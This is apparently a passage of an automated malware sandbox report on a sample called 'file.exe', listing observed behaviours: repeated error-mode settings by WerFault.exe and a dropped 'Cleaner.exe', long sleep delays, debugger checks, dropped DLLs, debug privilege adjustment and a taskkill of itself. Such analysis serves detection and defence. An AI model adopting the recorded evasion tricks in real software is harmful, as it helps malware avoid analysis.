Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\file.exe TID: 5128	Thread sleep count: 120 > 30			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5128	Thread sleep time: -72000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5132	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\dll[1]			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: Cleaner.exe, 0000001E.00000002.637830251.0000022E6AF8D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: file.exe, 00000000.00000000.286113047.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.279933925.0000000000663000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.266426572.0000000000663000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f

